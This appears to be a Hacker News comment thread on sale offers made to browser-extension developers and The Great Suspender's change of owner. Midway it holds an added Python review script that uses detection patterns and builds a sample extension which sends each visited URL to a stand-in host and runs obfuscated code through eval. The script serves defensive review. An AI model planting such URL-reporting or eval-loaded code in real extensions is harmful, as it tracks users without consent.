On a daily basis, I will get requests to sell the extension. Once or twice a week, I will receive an offer to add "a couple lines of code" to my extension which are always generously described as "allowed in the Chrome Web Store" by little fly-by-night organizations that only even have a landing page half the time and usually have throwaway-looking gmail accounts. Out of curiosity, I've asked a few what their code does and they never fully describe it, but it either collects analytics to ship home (my extension runs on all sites, so it's appetizing to them!) or places paid results at the top of any search results, for which I can make "thousands of dollars a month based on the number of North American users I have".
Here is an example email I received yesterday. It's a good example of how they call it "an SDK" and looks like one of the more legit ones (they registered a domain to send email from, at least).
We at [redacted] are considering purchasing the complete license and ownership of the extensions which have 50K+ active users, may I know if you would be interested in selling? If so, - what is your estimated price?
Regarding the SDK monetization which we discussed earlier, as it is not distractive and is compatible with any other monetization. We have straightforward terms and provide support for your users agreement. Our partners generate 3-20 K USD monthly with our solution for the browser extensions.
As a kind reminder, we are [redacted] — a reputable global peer-to-peer ethical proxy network. All our clients are big reputable companies, we authorize their business before providing any proxy plans.
Look forward to your further feedback and discussing further details of our financial proposal for your Software in a short Zoom call or here by emails.
Finally, I am also hounded by teams at Microsoft and Apple, who want me to port the extension to their new plugin ecosystems so it can be featured/showcased. I worked with Apple on one similar thing for an extension and it caused such a huge jump in support and feature requests from users that I was overwhelmed, so I am not keen to do it again until I have more free time. They can't understand why I don't want to grow by tens of thousands of users a week, but I'm just one person and don't make money from it whatsoever.
First, respond to every inquiry by telling them the price is USD$70,000,000.00. And stick to that price. Many of these sleazy companies get their leads from the same "lead generators," who will eventually take you off their lists because they know your terms are unreasonable. It doesn't work for everyone, but when I did it to spammers trying to buy my mailing list, it significantly reduced the volume of inquiries.
Second, put a page on your web site listing all of the offending companies, with links to the letter you received.
Apr 1, 2021 - Company X promised $3-5k/month if I alter your search results. Link.
Apr 3, 2021 - Company Y promised $1-5k/month if I promote their product on other people's web pages. Link.
A lot of people on HN will claim "O, noes! Lawyers! Libel!" I wouldn't worry about it. These people don't have the money for lawyers, are usually in geographies without legal systems, and don't want their names and other information exposed in a public legal filing. Plus, all you're doing is stating facts.
There's a W C Fields joke that ends, "Madame, we've already established what sort of woman you are, now we're just haggling over price."
Libel is for false statements. If you've got a real email from the company then it's not false.
In my opinion extensions have to be one of the worst sources of spyware these days. I am now extremely conservative with what extensions I use, and definitely would only use extensions from open source projects or companies that I trust.
Something needs to change. As long as extensions have such weak sandboxing along with such poor app review, Google/Mozilla etc will keep willingly shipping spyware unbeknownst to their users.
At least some mechanism of creating and verifying reproducible builds would go a long way.
I completely agree. There are a number of features I would really like to use in Firefox that are available only as extensions and I continue to resist installing them.
In fact, the only extension I use is uBlock Origin - which is based on a fairly rich social and community history behind that project and its author ...
Paying $0.20 per user to buy that seems extremely low.
Also, on the sandboxing/app review of extensions, does anybody know how well Apple vets Safari extensions? (I guess that could be hard if the evil parts are time-triggered, certainly if the code also is obfuscated (possibly in the name of minification).)
I feel like this is another prong in the story about threats to sustainability of open source done the way it used to/has been done previously.
It is. It’s very easy to generate big money with ad replacement or proxies.
Eventually the photo hosting service itself solved the problem that my extension was solving, but pretty much everyone who'd installed the extension still had it installed.
At some point, a company offered to buy it from me for a couple thousand dollars -- I was 18, and it seemed like a miracle! They asked me to add some code to the extension, and I assumed their intentions were good. I added their code, which I now realize was some sort of tracking/advertising program...and my extension promptly got taken down by Google.
Quite the learning experience!
Say, $5 per active user; non-exclusive license: I can maintain my fork of the extension, and use any of the code in new projects.
Trying to sandbox an extension that can modify arbitrary webpages in arbitrary ways is near futile.
Rhetorical questions: Do you want to support this thing? How much time does it take? Is this effort you want to spend? Are you not monetising this for a purpose? Are you happy with that purpose (obviously yes)? Do you still enjoy spending time on it? Do you see that time as well spent? Are the expectations from your side still being met? Are the expectations from everyone else still reasonable?
After all those questions, the basic answer is probably: you don't want to monetise it because it will wreck the actual purpose for which its intended or alternatively there isn't much of monetisation possibility due to its nature. But you can't spend more time on it because you have other Things to Do, like making money from other ways.
(At least this is my impression based on my experience)
Aww man, I'm really sad to hear that RecipeFilter won't be coming to Safari anytime soon. I really got my hopes up after it was in the keynote!
Since Apple distributes extensions in the App Store, have you thought about charging a buck or two for the Safari version? I know everyone says this, but I'd pay...
Do they ask you to do that for free or is there a monetary amount they tack on?
Once you burn your reputation by "selling out" the first time, who will trust your new forked version?
https://chrome.google.com/webstore/detail/recipe-filter/ahlc...
This is what capitalism looks like, folks. Someone "built it" so they now privately "own it", no matter how big it gets. It's not put into the hands of an organization. The profit motive is quite strong, which is why someone can be "corrupted" by very tempting messages like this. If you had a lake or a forest privately owned by one or two people, and they had a lot of debts, they could easily sell it to polluters and loggers.
Some people scoff and say "socialism has been tried, it never works." I admit that socialism simply trades one class of elites (the capitalists with a lot of shares) for another (the bureaucrats with a lot of political clout). BUT! I would like to say that socialism is not the only alternative. The other alternative is decentralized systems with no private ownership. I'm talking about science, open source software, and so on. There can be a Merkle tree of version updates (e.g. git version control) and each one can have various reputable organizations (like Zagat for software) building their reputation vetting it. Then, each community would run their own app store (think Wordpress plugins) which would work with these reputable organizations. There would be no heroes, no celebrities, no tweets at 3 am to 5 million people, no pulling from repos without peer review, no scientists instantly believed after publishing on arxiv.org .
Congratulations for building a popular extension, fancy_pantser. You live in a world where it's really bad to "criticize the profit", and where building it means you are responsible for it no matter how big it gets, but then we are all depending on your integrity and ability to rebuff life-changing amounts of money to not mine our data. We can pass laws to punish people after the fact, or we can gradually change our culture by rejecting "immediate gratification" of updates that are not vetted, just as corporations have done with bleeding edge vs stable Linux distros etc. Unfortunately, the Web has made it so that anything can be updated at any time, with no sysadmins or reviewers in the loop. It's a wonder more malware isn't silently everywhere already.
aka anarchy. that turns out to be worse.
The cost of using this extension is your information, and there are other products available that do the same thing at a lower cost. Based on the most fundamental concept of economics (supply and demand), "The Great Suspender" should fail as a product very quickly.
There's a sensible middle ground here. Take the paternalistic approach that (generally) protects people like my mum. Add settings that allow people like you and me to turn off updates or roll backwards. Push the people controlling the updates (like the Chrome store) to better protect their users.
Vetting could be better with a lot of companies as well; remember not so long ago when Windows Defender decided a critical system file was malware and broke a ton of systems?
Verification. Vetting. Gradual release. Automatically disable extensions if they changed ownership, or if there's suspicious activity on the account of the owner (e.g. new login in another country).
And they need to take a MUCH harder stance on malware. Right now they're not even acknowledging there's a problem, let alone acting on it.
I have plenty of things I want to complain about when it comes to Google's user-adversity but mandatory automatic updates is definitely not one of them.
If you're a technical user and really know (or really think that you know) what you're doing there are ways to effectively freeze a given version of an extension.
Download and unpacking from github is a pita, I'd need to do this to each of my computers separately
Switch to Chromium and use a package manager to stay up to date. Don't freeze updates, especially on your browser.
Or not use chrome
Chrome has features to dissuade users from installing extensions from outside the Chrome Web Store. If you load an unpacked extension, Chrome will issue an ominous warning (something like “this extension is untrusted, click here to uninstall”) on every launch.
One could argue this is for security, but this change was implemented around the same time that Google disabled the ability to self-host extensions that install into Chrome. Really this is a mechanism to shut out independent extension developers from any potential plausible third-party distribution method that doesn’t rely on the Chrome Web Store (which Google controls and aggressively moderates.)
Use Firefox.
Firefox has similar restrictions... you have to side load through Developer Options. If you’re not a developer, you will be questioning why you’re doing this and the less-technically inclined will simply never do it (like my wife)
And it is not entirely nefarious as you suggest. It limits the damage that sideloaded extensions did roughly 2010 and earlier. The WebExtension API was another assault on extensions. These days, chrome and Firefox have essentially closed a huge attack vector even though extensions are a shadow of their former selves. I was a skeptic for a long time (why should power users pay for the faults of everyone else?) but no more. Kudos.
Availability is part of security, and the most secure system is disconnected from the internet and powered off. Why are we cheering our software becoming less useful in the name of safety? The switch to WebExtensions was a monstrous loss of functionality!
Firefox also permits self-hosting extensions signed through their store, providing more freedom for extension developers.
I'm not sure what screen "Developer Options" is referring to, but you can load add-ons directly from your hard drive with no fuss from the Add-ons page (though you must be running the Nightly or Developer version of Firefox). Click the gear icon right above your list of installed add-ons (this is also the menu that lets you disable auto-updates).
* Unless it was explicitly revoked (updates do not revoke the signature) or Mozilla broke something that affects everything.
That's google's shtick. They do the same if you unlock bootloader on your android phone. Black nag screen with scary text on every reboot.
I've been sideloading vimium and thegreatsuspender for years and I haven't seen this message ever. Not on Mac nor Linux.
Extensions these days go through a rigorous review process, and Google regularly shuts down / imposes arbitrary restrictions against extensions due to changing policies.
I understand the importance of strong moderation to protect users from malicious extensions, but I believe Google is using that as an excuse to further lock down their store, increasing barriers to entry and making it harder for developers to build software to extend the most popular browser in the world without Google's blessing.
I routinely research several related topics for a project, and I will need 10-30 tabs per topic open at once. Surprisingly, chrome manages to handle 100+ tabs on my system without issue.
You should see my desktop
For example, last week I was shopping for a very specific, very expensive ceramic thrust bearing. I had 20+ pages open from 10+ suppliers and documentation sources. I needed those open all week while we decided on which one to buy. This was a minor background task, so I also had 60 other tabs open for my normal work flow.
Just because people use a tool differently than you doesn't make them wrong.
Back in the days of social bookmarks (like del.icio.us) pretty much everyone had a "toread" folder. The main problem is that you have to remember to delete them after reading them. That's not really a problem for good articles you remember reading, but the crap articles you don't remember, or quit reading are easy to forget to delete from the bookmarks. So, you end up reading the same crap articles several times. With a tab, you close the window and you're done. With bookmarks, you have to close the window, go through your bookmarks, find the one that was crap that you have already forgotten and delete it.
There's several other advantages to tabs too:
Like the fact that they're naturally organized by window based on the task you're doing.
You'll see them more often, and thus be reminded more often.
They save context, like forwards and back history, and information you may have typed in, or a UI you may have manipulated.
- Auto Refresh Premium, static.trckljanalytic.com
- Stream Video Downloader, static.trckpath.com
- Custom Feed for Facebook, api.trackized.com
- Notifications for Instagram, pc.findanalytic.com
- Flash Video Downloader, static.trackivation.com
- Ratings Preview for YouTube, cdn.webtraanalytica.com
Copied from https://github.com/greatsuspender/thegreatsuspender/issues/1...
Another loser in this whole game is the honest hobby extension developers, who have to deal with the power-users who might promote their extensions not wanting to bother for fear of not being able to keep a watch for potential malicious updates for all of them.
Saw your article via HN.
As an easier permanent fix, just uninstall The Great Suspender and install Auto Tab Discard (https://add0n.com/tab-discard.html). It does the same thing.
It's available on:
Firefox - Auto Tab Discard – Get this Extension for Firefox (en-US) (https://addons.mozilla.org/en-US/firefox/addon/auto-tab-disc...)
Edge - Auto Tab Discard - Microsoft Edge Addons (https://microsoftedge.microsoft.com/addons/detail/auto-tab-d...)
or even if you're still using Chrome - Auto Tab Discard - Chrome Web Store (https://chrome.google.com/webstore/detail/auto-tab-discard/j...)
From the website it sounds like the favicon is changed. So the tab doesn’t go away, it’s just on pause
Google: “a discarded tab doesn't go anywhere. We kill it but it's still visible on the Chrome tab strip. If you navigate back to a tab that's been discarded, it'll reload when clicked. Form content, scroll position and so on are saved and restored the same way they would be during forward/backward tab navigation.”
In the future this will be updated to also use a serializer for discarded tabs.
Tab discarding is just a more efficient, native implementation of what Great Suspender aimed to do in the first place.
So it's not that auto-update is flatly a bad idea, it's more that it's a trade-off that sometimes makes security issues almost evaporate, and sometimes makes them impossible to dodge.
What are the odds of one dependency being taken over by a shady anonymous entity?
While researching, I found many users reporting that forced updates of software installed by Snap caused many problems and I decided against using it; I was able to install Certbot via a good old-fashioned RPM from EPEL.
I also removed Snap from a different Ubuntu server which had recently been upgraded to 20.04 (I wasn't using LXD on that server so there was no need for it).
1. https://community.letsencrypt.org/t/how-to-install-certbot-w...
FWIW, I've been allowing Apt and Yum package managers to automatically update for about 8 years without any problems. The only manual OS updating I do is for a set of physical (non-virtual) servers that are operational 24/7.
Edit: OneTab[2] is also pretty good when you have lots of tabs open for research or work.
I used to use TGS excessively and TabsOutliner has completely changed my workflow. Now I just sort tabs into categories and then kill the entire window until I am in that context.
It sorta looks dated, but I find it amazing:
https://chrome.google.com/webstore/detail/tabs-outliner/eggk...
[0] https://github.com/greatsuspender/thegreatsuspender/issues/1...
Sharing bookmarks is not the same as "sharing it with anyone in the world" - without any notification.
It is really a shame that basic functionality like this isn't built into more browsers and we have to rely on extensions to fill the gaps just to keep memory usage under control for tab-a-holics like myself. :(
chrome://discards/ has some advanced options (in Chromium-based browsers).
Funnily enough, Google mentions The Great Suspender as inspiration for this feature in the August 2015 changelog: https://developers.google.com/web/updates/2015/09/tab-discar...
> We actually had a great chat with the author of the Great Suspender extension while developing tab discarding and they're glad to see us natively tackling this problem in ways that are more efficient than an extension might be able to, such as losing the state of your user inactions.
I still sometimes use extensions like Great Suspender to give more control over the process (e.g. to suspend more aggressively on RAM-constrained machines or where the user uses a lot of tabs).
Since this news came out I have switched to "Auto Tab Discard".
The way I see it, extension developers get to come up with innovative new features first, and then the first-party vendors like Apple, Google, and Microsoft take note and eventually do just that: Integrate it into their own products.
For example: The Great Suspender → Sleeping Tabs [experimental] (Microsoft/Edge); Flux → Night Shift (Apple/iOS); Growl → macOS Notifications (Apple/macOS); Swype → iOS Built-in Keyboard (Apple/iOS); etc
Edit: Fix formatting.
Now that I write that, I'm not sure how permissions and upgrades go together. If an extension that had tight permissions relaxes them I'd get notified before they took effect, right?
It's by the same dev too but it uses Chrome's Native Tab Discarding feature and I found it way more efficient (at the time I started using it a few years ago - haven't compared recently).
[1] https://chrome.google.com/webstore/detail/the-great-discarde...
It would be an interesting exercise to try and build an open source organisation around developing and publishing extensions in the open.
Package managers are nice for the lazy, but then we get stuff like this:
https://qz.com/646467/how-one-programmer-broke-the-internet-...
Actually you might be pulling a bunch of malicious updates in 2-3 modules deep in your dependency tree anytime.
As a society we should be moving away from a culture of “immediate” updates eg on Twitter etc. And go towards more “peer review” like in science. Otherwise we are putting responsibility on every individual to verify all sides of the story and get informed. They don’t and society gets more and more divided. Imagine if a scientist tweeted at 3am and half their followers instantly believed them. Or if an open source contributor’s pull request was instantly accepted and pulled overnight by everyone. That’s why USA and other countries are now so divided politically. Individual responsibility of 100% of the downstream nodes is strange to outsource responsibility to.
I wrote about this back in 2012 predicting what would happen:
What happened to the notion of using stable, centralized package repositories like Debian’s or Red Hat’s in order to build one’s software? I did a lot of Free Software development in the early millennium, then was away from the scene for a few years, and when I came back this desire for convenience above all else really baffles me.
https://qbix.com/blog/2021/01/15/open-source-communities/
https://qbix.com/blog/2018/01/17/modern-security-practices-f...
I'm now framing the problem as "inauthentic speech".
> ...go towards more “peer review” like in science.
Ditto journalism and reporting.
This is a universal problem. The core solution remains the same.
Cite your sources
Show your work
Sign your name
WRT John Walker's screed, I really thought certificates and web of trust would have become the norm by now. Anything unsigned would be treated as gossip or worse. Certs could be revoked as needed. Further, every trusted digital relationship would start with a key exchange. Vs relying on username and password. eg Banks would issue me a Secure Enclave of some sort, like a USB fob.
I'd like to understand why this didn't happen. My best guess is "Worse is better" enabled predators and parasites. Which has been acceptable during the gold rush.
> Pray that the shady developer doesn’t issue a malicious update to The Great Suspender later. (There’s no sensible way to disable updates of an individual extension.)
Does Debian ship packages for individual browser extensions?
I mean, if they do I'm sure it's not scalable and-- after spending time reading debuild manual-- a giant, archaic pain in the ass.
On the other hand, all these app delivery systems are so damned pernicious and require constant vigilance. We may have arrived at a moment in time where this is actually a difficult decision:
* pay somebody a living wage to burrow down into Debian's WoT bureaucracy and add at least a selection of this functionality without phoning home
* continue playing the most tedious game of whackamole with a whackamole game that mines all our data in order to learn how best to beat all users at whackamole
They do, for a couple of more notable ones (HTTPS Everywhere, uBlock Origin, Proxy Switcher, etc.) [0]
> I mean, if they do I'm sure it's not scalable and-- after spending time reading debuild manual-- a giant, archaic pain in the ass.
The biggest problem is to find a person to be a maintainer that is willing to keep up with the upstream development.
[0] https://packages.debian.org/search?keywords=webext-&searchon...
> The biggest problem is to find a person to be a maintainer that is willing to keep up with the upstream development.
That sounds like the kind of job someone does in return for money.
Edit: looks like it works in Chrome as well.
Quite similar to what happened to Nano Adblocker/Defender a few months ago.
Whether they are lowballing candidates with that offer, I can't say.
Actually it does appear that the owner was changed from "deanoemcke" to "thegreatsuspender" (the new mystery owner) on the Chrome Web Store page.
I agree that warning when updating an extension if the stated owner has changed would be valuable.
Workaround to reopen a page is just to cut'n'paste the original URL from a parameter at the end of the TGS URL.
For dev tools and such, I set a whitelist of the sites they're allowed to run on, using that same extension details page. There's no need for your JSON formatter etc. to run on every single page you visit. Also speeds up browsing.
That's something that worries me, whenever I install a software with trusted privileges.
Software companies can sell their products -- and user base -- to other companies without notice.
And it can be even worse in the free software world: think about all the updates that happen when you type `apt-get|yum|brew|npm|pip update`. What are the odds of a single dependency being taken over by a shady anonymous entity?
You’ve Changed: Detecting Malicious Browser Extensions through their Update Deltas
The review doesn't take much time. What I look for:
1. The manifest for what network endpoints the extension is allowed to call.
2. Any URL in the code that is external to the extension.
3. Any remote network function (fetch/XHR/links) and traceback to the call sites.
4. Whether there is any obfuscated code or not.
If anything found in those spots seems fishy / unclear, I don't install the extension. Takes a few minutes, but catches most of the threat vectors. Skimming the code also gives me a sense of what sort of developer is behind the extension. Some code clearly shows a developer cares about privacy and / or security, which unconsciously adds karma for that dev in my book.
Like others above, I don't use many extensions, but those I use I have to trust.
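The four-point review in the comment above, mechanised as an added example (not code from the thread or from any extension it names): it reads the manifest's host grants, pulls URL literals and network call sites out of the JavaScript, and flags crude obfuscation signals. The sample extension it writes, the `stats.example.invalid` endpoint, and the thresholds are constructed assumptions.

```python
"""Static pre-install review of an unpacked browser extension.
Added example (not from the thread): mechanises the four checks in the comment above.
The sample extension, thresholds and scoring are constructed assumptions."""
import json
import os
import re
import tempfile

URL_RE = re.compile(r"https?://[^\s\"'`<>]+")
NET_CALL_RE = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon|WebSocket|EventSource)\b")
EVAL_RE = re.compile(r"\b(eval|Function|atob|unescape)\s*\(")
HEX_ESC_RE = re.compile(r"\\x[0-9a-fA-F]{2}")

def manifest_hosts(manifest):
    """Every host pattern the manifest grants, covering MV2 and MV3 layouts."""
    hosts = set()
    for key in ("permissions", "optional_permissions", "host_permissions"):
        for entry in manifest.get(key, []):
            if isinstance(entry, str) and ("://" in entry or entry == "<all_urls>"):
                hosts.add(entry)
    for script in manifest.get("content_scripts", []):
        hosts.update(script.get("matches", []))
    return sorted(hosts)

def scan_js(text, name):
    """URL literals, network call sites (file, line, api) and obfuscation signals."""
    urls = sorted(set(URL_RE.findall(text)))
    calls = [(name, n, m.group(1)) for n, line in enumerate(text.splitlines(), 1)
             for m in NET_CALL_RE.finditer(line)]
    signals = []
    longest = max((len(l) for l in text.splitlines()), default=0)
    if longest > 2000:
        signals.append(f"{name}: {longest}-char line (minified or packed)")
    if len(HEX_ESC_RE.findall(text)) > 20:
        signals.append(f"{name}: strings built from \\x escapes")
    m = EVAL_RE.search(text)
    if m:
        signals.append(f"{name}: dynamic code or decoding via {m.group(1)}()")
    return urls, calls, signals

def review_extension(ext_dir):
    """Walk an unpacked extension directory and gather the review findings."""
    with open(os.path.join(ext_dir, "manifest.json"), encoding="utf-8") as fh:
        manifest = json.load(fh)
    findings = {"hosts": manifest_hosts(manifest), "urls": set(), "calls": [], "signals": []}
    for root, _, files in os.walk(ext_dir):
        for fn in sorted(f for f in files if f.endswith(".js")):
            path = os.path.join(root, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                urls, calls, signals = scan_js(fh.read(), os.path.relpath(path, ext_dir))
            findings["urls"].update(urls)
            findings["calls"] += calls
            findings["signals"] += signals
    findings["urls"] = sorted(findings["urls"])
    # Obfuscation, or network calls from code allowed on every site, means "read it closely".
    findings["fishy"] = bool(findings["signals"]) or (
        "<all_urls>" in findings["hosts"] and bool(findings["calls"]))
    return findings

def build_sample_extension(base_dir=None):
    """Write a constructed (not real) extension that trips the checks, for a dry run."""
    base_dir = base_dir or os.path.join(tempfile.mkdtemp(), "sample-ext")
    os.makedirs(base_dir, exist_ok=True)
    manifest = {"manifest_version": 3, "name": "sample", "version": "1.0",
                "host_permissions": ["<all_urls>"], "background": {"service_worker": "bg.js"},
                "content_scripts": [{"matches": ["https://*.example.com/*"], "js": ["cs.js"]}]}
    files = {"manifest.json": json.dumps(manifest),
             # background worker reporting every visited URL to a constructed endpoint
             "bg.js": "chrome.tabs.onUpdated.addListener((id, info, tab) => {\n"
                      "  fetch('https://stats.example.invalid/c?u=' + tab.url);\n});\n",
             # content script whose payload hides behind hex escapes and eval/atob
             "cs.js": "var s = '" + "\\x61" * 25 + "';\neval(atob(s));\n"}
    for fn, body in files.items():
        with open(os.path.join(base_dir, fn), "w", encoding="utf-8") as fh:
            fh.write(body)
    return base_dir

if __name__ == "__main__":
    print(json.dumps(review_extension(build_sample_extension()), indent=2))
```

Point `review_extension` at any unpacked extension directory; the heuristics are deliberately crude and only tell you where to read first, not whether the code is safe.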
https://www.windowscentral.com/microsoft-edge-canary-can-put...
Are there any potential downsides to this? I was also curious how does loading this format avoid updates?
TLDR: A popular extension was quietly sold off to an unknown party that subsequently added tracking/analytics. Not specifically malware, but not trustworthy either.
Did I miss anything?
[0]: https://www.reddit.com/r/KyleTaylor/comments/jowlt2/open_sou...
Google never really cared about user privacy at all.